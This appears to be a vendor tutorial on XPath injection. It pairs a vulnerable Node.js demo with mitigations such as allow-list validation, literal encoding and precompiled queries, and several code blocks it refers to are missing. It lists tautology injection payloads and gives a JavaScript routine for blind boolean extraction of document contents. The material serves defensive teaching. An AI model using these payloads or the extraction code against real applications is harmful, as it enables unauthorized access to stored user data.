When developers need to query an XML database, they use XML Path Language (XPath) to construct their queries. An XPath query searches an XML document for nodes that match a specified pattern or have particular attributes. XML databases remain a common means of storing user data. For example, when a user supplies their login ID and password, the application runs a preconfigured XPath query that searches the database for matching credentials and grants access if that combination exists.
However, building an XPath query from user-supplied information introduces the risk of XPath injection attacks. These attacks occur when specially crafted input changes the structure of an XPath query, giving the attacker access to the XML data structure. Malicious actors can take advantage of user input fields to inject arbitrary XPath code that reads the XML document data and, depending on how the application uses the query results, lets them tamper with it. This means that, even if the attacker cannot recover plaintext passwords (for example, because the database stores only password hashes), they can still use the discovered XML structure to cause additional harm.
In this article, you’ll view some example code to discover how XPath injection attacks work and learn some best practices for preventing and mitigating them.
The risks of XPath injection
XPath injection belongs to the broader class of injection flaws, which OWASP ranks among the most critical web application security risks. A successful attack can have several potential consequences, including:
- Access to and exfiltration of sensitive data or personally identifiable information (PII).
- Deletion, modification, or corruption of crucial business data.
- Escalation to root access on a system, allowing actions that compromise system integrity.
- Distribution of malware or other malicious code to internal and external users.
The consequences of such attacks can damage your application’s reputation and harm your users. Therefore, you need to be aware of the risks associated with XPath injection attacks and take the necessary measures to mitigate them. In the next section, you’ll examine a sample XPath injection attack to learn how best to defend against it.
How XPath injection works
This section reviews how XPath queries work, provides a hands-on demonstration of an XPath injection attack, and explains how to mitigate or prevent these attacks.
How XPath queries work
Imagine an application that enables users to search for items in an XML file. To enable this function, the application uses the following expression:
In this query, the user-supplied string replaces the variable in the expression. The query then searches the XML document for all text that matches this input. When it executes with ordinary input, the application works as expected. However, this type of query is vulnerable to attackers who can enter malicious XPath code that allows them to bypass the XML document hierarchy. Consequently, they may access or even modify the XML data in unforeseen and dangerous ways.
For example, a knowledgeable attacker can use the user input form to inject the following XPath code into the query’s variable:
As a result, the application constructs and executes the following XPath query:
A query of this type would match all nodes in an XML document, and depending on the program, might allow the attacker to access and modify any data the document contains.
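The expression itself isn’t reproduced above, so the sketch below assumes a hypothetical search template of the form //*[contains(text(), '...')] and a hypothetical helper named buildSearchQuery. It illustrates only the general mechanism: when input is concatenated into a string literal, a crafted value can close the literal and append a condition that is always true.

```javascript
// ASSUMPTION: hypothetical search template; the article's real expression
// is not shown, so //*[contains(text(), '...')] is illustrative only.
function buildSearchQuery(searchTerm) {
  // VULNERABLE: user input is pasted directly inside a string literal.
  return "//*[contains(text(), '" + searchTerm + "')]";
}

// A normal search term produces the intended query.
const normal = buildSearchQuery("laptop");

// A crafted term closes the literal and the contains() call,
// then appends a condition that is always true.
const injected = buildSearchQuery("') or ('1'='1");

console.log(normal);   // //*[contains(text(), 'laptop')]
console.log(injected); // //*[contains(text(), '') or ('1'='1')]
```

Because '1'='1' is always true, the predicate no longer depends on the search term, so every element in the document matches.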
Additionally, an attacker can ascertain an XML document’s structure, which can potentially enable them to navigate among several layers of the contained data. When this type of access is the goal, malicious actors tend to use one of the following two XPath injection methods:
- Booleanization: Boolean queries produce different behaviors depending on whether they resolve to true or false. An attacker could inject a Boolean query that returns true if a login request is successful and false if the login fails. This allows the attacker to retrieve a single bit of information (success or failure) with each query. Repeating this process enables an attacker to gain insight into the contents of the XML document.
- XML crawling: Attackers can inject specially crafted queries that enable them to discover the structure of an XML document. These queries allow the attacker to “crawl” through an XML document without knowing its structure beforehand. By repeatedly sending such queries to the XML document and examining the responses, the attacker can gradually discover the structure of the document and the elements it contains. Eventually, they can piece together the gathered information to reconstruct the entire document. This approach can be an effective means for discovering sensitive information or exploitable vulnerabilities in the document structure.
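Both techniques can be sketched in a few lines. This is an illustration under stated assumptions, not a working exploit: it assumes a hypothetical oracle function that submits a payload through a vulnerable input quoted inside a predicate such as [username='...'] and reports whether the application responded as if the condition were true. The helper names (wrap, extractString) and the example path are hypothetical. The code recovers the string value of an XPath expression one yes/no answer at a time, using the standard XPath 1.0 functions string-length() and substring().

```javascript
// Sketch of blind ("booleanized") XPath extraction.
// ASSUMPTION: oracle(payload) is a hypothetical function that submits the
// payload through a vulnerable input quoted inside a predicate such as
// [username='...'] and returns true if the application behaves as if the
// predicate matched (for example, "login succeeded").
const CHARSET =
  "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";

// Turns an XPath condition into an injectable payload. Inside [username='...']
// it yields: username='' or CONDITION or 'a'='b'
// Both outer comparisons are false (assuming no empty usernames), so the
// predicate is true exactly when CONDITION is true.
function wrap(condition) {
  return `' or ${condition} or 'a'='b`;
}

// Recovers the string value of an XPath expression, one true/false answer
// per request. maxLength caps how many lengths are probed.
function extractString(oracle, expression, maxLength = 64) {
  // Step 1: learn the length by asking "is it N?" for N = 0, 1, 2, ...
  let length = -1;
  for (let n = 0; n <= maxLength; n++) {
    if (oracle(wrap(`string-length(${expression})=${n}`))) {
      length = n;
      break;
    }
  }
  if (length < 0) return null; // longer than maxLength, or no oracle signal

  // Step 2: for each 1-based position, test candidate characters in turn.
  let result = "";
  for (let i = 1; i <= length; i++) {
    const found = [...CHARSET].find((c) =>
      oracle(wrap(`substring(${expression},${i},1)='${c}'`))
    );
    result += found || "?"; // "?" marks a character outside CHARSET
  }
  return result;
}
```

Passing a data path such as /users/user[1]/password (hypothetical) targets stored values, while passing name(/*) or name(/*[1]/*[2]) reveals element names, which is how crawling can reconstruct a document’s structure without knowing it beforehand.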
Sample XPath injection vulnerabilities
To see how XPath injection vulnerabilities emerge and function, you’ll create a demo application that is vulnerable to these attacks. The application checks user-supplied input and returns matching data from an XML document.
Say you’re working with an e-commerce platform and maintain a list of your customers (users), each identified by a username. To connect orders with their purchasers, you use an application that searches for a username and returns the orders associated with it, as listed on the order status page.
Below is an XML data construct that represents this scenario.
You’ll use JavaScript to load the above data and create a basic application that allows users to query it using inputs they supply.
In the same directory, run the following command to initialize a Node.js project (Node.js is a JavaScript runtime):
Then, you’ll need the following two packages to parse and query XML. Note that neither is built into Node.js; both are installed from npm:
- xpath: a DOM 3 XPath implementation and helper for JavaScript that evaluates XPath query strings
- xmldom: a JavaScript implementation of the W3C DOM for Node.js that provides the DOMParser interface for parsing XML
Open a terminal to your app directory and run the following command:
In the same directory, create a JavaScript file for the application and load the XML data as follows. First, import the required dependencies:
Then, use Node.js’s built-in readline module to create a simple interface that accepts user input:
Next, create a function that executes the XPath query and returns the data matching the input, using the code below:
In the above example, the application executes an XPath query that selects the order elements that are children of orders and that contain a username element whose value equals the user-supplied input. The bracketed part of the expression specifies a predicate condition that the selected elements must satisfy. In this case, the predicate specifies that the username element must have a value equal to the value of the order variable.
This way, only the order elements under orders that satisfy the predicate are selected. Now run the following command to execute this program:
The program prompts you to enter a username, just as a user would type into a search field.
Enter a username from your XML file, as shown below. The program should display the associated order. If the username doesn’t exist, it displays a “User does not exist” message instead.
Exploring XPath injection vulnerabilities
This application is working as it should. However, an attacker with malicious intentions can run arbitrary XPath queries using the supplied user input to get access without needing a valid username.
The application is vulnerable to malicious code injection. The predicate in the query is the attacker’s target here. An attacker can craft input that makes the predicate always evaluate to true, which lets the query return data without the attacker supplying a valid username. Here are some sample payloads that allow attackers to maneuver around the data hierarchy through the user-supplied input:
- 'or'1'='1
- text' or '1' = '1
- ' or 1=1 or 'a'='a
- ' or ''='
- a' or true() or '
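To see why each payload works, the sketch below substitutes them into a hypothetical reconstruction of the lookup query described earlier, /orders/order[username='...']. The exact expression the demo application uses may differ, and buildOrderQuery is an illustrative name.

```javascript
// ASSUMPTION: hypothetical reconstruction of the lookup query, selecting
// order elements under orders whose username child equals the input.
function buildOrderQuery(username) {
  // VULNERABLE: the input is concatenated straight into the predicate.
  return "/orders/order[username='" + username + "']";
}

// The sample payloads listed above.
const payloads = [
  "'or'1'='1",
  "text' or '1' = '1",
  "' or 1=1 or 'a'='a",
  "' or ''='",
  "a' or true() or '",
];

for (const payload of payloads) {
  console.log(buildOrderQuery(payload));
}
// /orders/order[username=''or'1'='1']
// /orders/order[username='text' or '1' = '1']
// /orders/order[username='' or 1=1 or 'a'='a']
// /orders/order[username='' or ''='']
// /orders/order[username='a' or true() or '']
```

In every case, the injected or clause is true regardless of the username, so the predicate matches all order elements.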
Here is how to execute each of the above payloads against the example application:
Mitigating XPath injections
As the example above shows, a properly constructed injection lets an attacker access restricted data far too easily. This section explores how you can patch common vulnerabilities and mitigate the risks associated with XPath injection.
This attack takes advantage of a lack of proper variable parameter binding in the application’s code. The application concatenates user-supplied input directly into an XPath query without adequately validating or sanitizing the input. This is where the attacker can insert malicious XPath statements into the query to access sensitive information from the XML database.
To mitigate this, the most robust strategy is parameter binding, which keeps user input separate from the structure of the query. A simpler first line of defense is input validation: you can use a regular expression that rejects any input containing characters other than letters or numbers. This method prevents potential attackers from constructing arbitrary queries through that input.
To sanitize and prevent XPath injection vulnerabilities in this example, use the following code:
The above code uses regex to detect and filter non-alphanumeric characters. If the supplied input has such characters, the application will stop any further execution and provide the message, “Invalid characters not allowed.” However, if the input passes this test, the application will proceed and execute the query with the supplied input. You can test the code with the arbitrary queries discussed in the section above.
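A minimal sketch of such an allow-list check might look like the following. It assumes usernames are purely alphanumeric; the pattern and the validateUsername name are illustrative rather than taken from the demo application.

```javascript
// Allow-list validation: accept only ASCII letters and digits.
// ASSUMPTION: usernames in this application are purely alphanumeric.
const USERNAME_PATTERN = /^[A-Za-z0-9]+$/;

function validateUsername(input) {
  if (!USERNAME_PATTERN.test(input)) {
    // Stop before any XPath query is built from this input.
    throw new Error("Invalid characters not allowed.");
  }
  return input;
}

// Usage: a normal name passes, an injection payload is rejected.
for (const candidate of ["alice", "' or ''='"]) {
  try {
    console.log("Accepted:", validateUsername(candidate));
  } catch (err) {
    console.log("Rejected:", err.message);
  }
}
```

Rejecting the input outright, rather than silently stripping the offending characters, keeps the application from querying a different username than the one the user actually typed.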
Although you can sanitize user inputs, an attacker could still use other techniques to bypass this filter.
It’s virtually impossible to escape every potentially exploitable character using regular expressions alone. In cases like user authentication, the application must accept passwords that may legitimately contain such characters, so rejecting them outright isn’t an option. This means that sanitizing user inputs is not wholly reliable.
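When input legitimately needs quotes, as with passwords, a different technique from the regex filter is to encode the value as an XPath 1.0 string literal instead of rejecting it. XPath 1.0 string literals have no escape sequences, so a value containing both quote types must be assembled with concat(). The sketch below assumes the same hypothetical /orders/order[username=...] query, and xpathStringLiteral is an illustrative name. This is still string building, so treat it as a fallback for cases where variable-based queries aren’t available.

```javascript
// Encodes an arbitrary JavaScript string as a safe XPath 1.0 string literal.
// XPath 1.0 has no escape sequences inside literals, so:
//  - no single quote -> wrap in single quotes
//  - no double quote -> wrap in double quotes
//  - both present    -> split on single quotes and rejoin with concat()
function xpathStringLiteral(value) {
  if (!value.includes("'")) return `'${value}'`;
  if (!value.includes('"')) return `"${value}"`;
  const pieces = value.split("'").map((part) => `'${part}'`);
  return `concat(${pieces.join(`, "'", `)})`;
}

// ASSUMPTION: hypothetical order query. The encoded literal fills the value
// slot, so the input is only ever compared, never parsed as XPath syntax.
function buildOrderQuery(username) {
  return `/orders/order[username=${xpathStringLiteral(username)}]`;
}

console.log(buildOrderQuery("' or ''='"));
// /orders/order[username="' or ''='"]
console.log(buildOrderQuery(`p'ss"word`));
// /orders/order[username=concat('p', "'", 'ss"word')]
```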
Another alternative is to use parameterized XPath queries, as shown below:
However, this approach still builds a dynamic XPath expression through string interpolation, and the interpolated value comes from user-supplied data. Therefore, this method may not be sufficient to fully protect against XPath injection.
Using precompiled XPath queries
You can use a precompiled XPath query to avoid building the expression dynamically. To do this, define the XPath expression once, as a separate variable, and pass in the user’s value only when the query is evaluated.
The precompiled XPath query uses a variable to represent the user-provided input, so the query’s structure is never constructed from user-supplied data. Thus, an attacker cannot inject arbitrary XPath code to gain access. Here is an example of how to use a precompiled XPath query:
This helps ensure that user-supplied input is treated as separate from the XPath query rather than as part of the query itself.
Conclusion
You have now learned some common strategies for executing XPath injection attacks and gained insight into their potential consequences. Fortunately, you also discovered some ways to mitigate the risks.
However, your application may still be vulnerable to XPath injection even after implementing the security measures you explored. To maximize application security, turning to tools like Web Application Firewalls (WAFs) or Web Application and API Protection (WAAP) can fill in the gaps that coding best practices may not address. Visit Trend Micro today to begin assessing your app’s security posture.